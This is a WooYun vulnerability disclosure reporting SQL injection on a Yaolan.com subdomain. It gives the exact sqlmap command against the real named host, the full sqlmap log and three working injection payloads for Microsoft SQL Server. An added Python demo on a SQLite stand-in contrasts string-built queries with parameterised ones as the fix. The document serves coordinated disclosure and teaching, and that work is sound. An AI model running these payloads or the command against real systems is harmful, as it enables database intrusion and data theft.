
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0136134

Title: SQL injection on a 摇篮网 (Yaolan.com) site leaks data

Vendor: 摇篮网 (Yaolan.com)

Author: crown丶prince

Submitted: 2015-08-23 13:02

Fixed: 2015-10-10 09:42

Published: 2015-10-10 09:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-23: details sent to the vendor, awaiting vendor response
2015-08-26: vendor confirmed; details visible to the vendor only
2015-09-05: details disclosed to core white hats and domain experts
2015-09-15: details disclosed to regular white hats
2015-09-25: details disclosed to intern white hats
2015-10-10: details disclosed to the public

Brief description:

SQL injection on a 摇篮网 (Yaolan.com) site leaks data

Details:

POST injection:
[sqlmap command]:
python sqlmap.py -u "http://mensao.app.yaolan.com/Test" --data "username=88952634 " --current-db
[Injection point]: mensao.app.yaolan.com
[POST body]: username=88952634
current database: 'mensao.app.yaolan.com'
[sqlmap screenshot] below:

Proof of vulnerability:

1.jpg


[sqlmap log]:

[18:59:13] [INFO] testing connection to the target URL
[18:59:13] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:59:14] [INFO] target URL is stable
[18:59:14] [INFO] testing if POST parameter 'username' is dynamic
[18:59:14] [INFO] confirming that POST parameter 'username' is dynamic
[18:59:14] [WARNING] POST parameter 'username' does not appear dynamic
[18:59:14] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[18:59:15] [INFO] testing for SQL injection on POST parameter 'username'
[18:59:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:15] [INFO] POST parameter 'username' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:59:17] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[19:00:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:00:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:00:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:00:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[19:00:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:00:12] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[19:00:13] [INFO] testing 'MySQL inline queries'
[19:00:13] [INFO] testing 'PostgreSQL inline queries'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:00:13] [INFO] testing 'Oracle inline queries'
[19:00:13] [INFO] testing 'SQLite inline queries'
[19:00:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:00:13] [WARNING] time-based comparison requires larger statistical model, please wait.
[19:00:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[19:00:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[19:00:23] [INFO] POST parameter 'username' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[19:00:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:00:33] [INFO] POST parameter 'username' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[19:00:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:00:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:00:33] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:00:34] [INFO] target URL appears to have 5 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[19:00:36] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[19:00:36] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=88952634 ' AND 9903=9903 AND 'QHqk'='QHqk

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=88952634 '; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=88952634 ' WAITFOR DELAY '0:0:5'--
---
[19:00:37] [INFO] testing Microsoft SQL Server
[19:00:37] [INFO] confirming Microsoft SQL Server
[19:00:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
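The three payloads sqlmap reported all hinge on one pattern: the POST value `username` is spliced into a single-quoted SQL string literal, so a quote in the input closes that literal and the rest runs as SQL. The following is an added example, not code from the report and not the target's code. It uses an in-memory SQLite table as a stand-in for the unknown back-end schema (the `users` table and `username` column are assumptions), renders the report's payloads as the full statements a concatenating query builder would produce, repeats sqlmap's boolean-based blind check (a TRUE and a FALSE condition must produce different responses) against both the concatenating and a parameterised lookup, and shows the latter does not react. The two `WAITFOR DELAY` payloads are T-SQL and only rendered here; SQLite cannot execute them. The trailing space in the report's base value (`88952634 `) is dropped in the example because SQL Server ignores trailing spaces in `=` comparisons while SQLite does not.

```python
import sqlite3

# Constructed stand-in for the target database (schema is an assumption; the
# real schema behind mensao.app.yaolan.com/Test is not given in the report).
SAMPLE_USERS = [("88952634",), ("alice",)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (username) VALUES (?)", SAMPLE_USERS)
    return conn


def build_query_vulnerable(username):
    # The pattern the sqlmap payloads imply: the POST value is spliced into a
    # single-quoted string literal, so a quote in the input ends that literal.
    return f"SELECT COUNT(*) FROM users WHERE username = '{username}'"


def lookup_vulnerable(conn, username):
    return conn.execute(build_query_vulnerable(username)).fetchone()[0]


def lookup_safe(conn, username):
    # Hardened form: the value travels as a bound parameter, never as SQL text.
    return conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ?", (username,)
    ).fetchone()[0]


# The report's three payloads. The base value's trailing space is dropped:
# SQL Server ignores trailing spaces in '=' comparisons, SQLite does not.
BASE = "88952634"
PAYLOADS = {
    "boolean-based blind": BASE + "' AND 9903=9903 AND 'QHqk'='QHqk",
    "stacked queries": BASE + "'; WAITFOR DELAY '0:0:5'--",
    "time-based blind": BASE + "' WAITFOR DELAY '0:0:5'--",
}


def render_payloads():
    # The full statement each payload yields under the vulnerable builder.
    # Note how '--' comments out the application's own closing quote.
    return {name: build_query_vulnerable(p) for name, p in PAYLOADS.items()}


def boolean_blind_probe(lookup, conn):
    # sqlmap's boolean-based check: the same base value with a TRUE and a
    # FALSE condition appended must yield different responses to be injectable.
    true_val = BASE + "' AND 9903=9903 AND 'QHqk'='QHqk"
    false_val = BASE + "' AND 9903=9904 AND 'QHqk'='QHqk"
    return lookup(conn, true_val) != lookup(conn, false_val)


if __name__ == "__main__":
    db = make_db()
    for name, sql in render_payloads().items():
        print(f"{name}: {sql}")
    print("concatenating lookup injectable:", boolean_blind_probe(lookup_vulnerable, db))
    print("parameterised lookup injectable:", boolean_blind_probe(lookup_safe, db))
```

Run stand-alone, the script prints the three rendered statements, then `True` for the concatenating lookup and `False` for the parameterised one. The same replacement (bound parameters instead of string building, on every query the endpoint runs) is the fix for the finding; SQL Server's `WAITFOR` and stacked-query support are what turned a blind boolean oracle into a time-based and command-capable one, which is why sqlmap found three techniques on the same parameter.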

Remediation:

Copyright notice: please credit crown丶prince@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-08-26 09:40

Vendor reply:

The vulnerability is being fixed; thanks to the white hat for the work!

Latest status:

None yet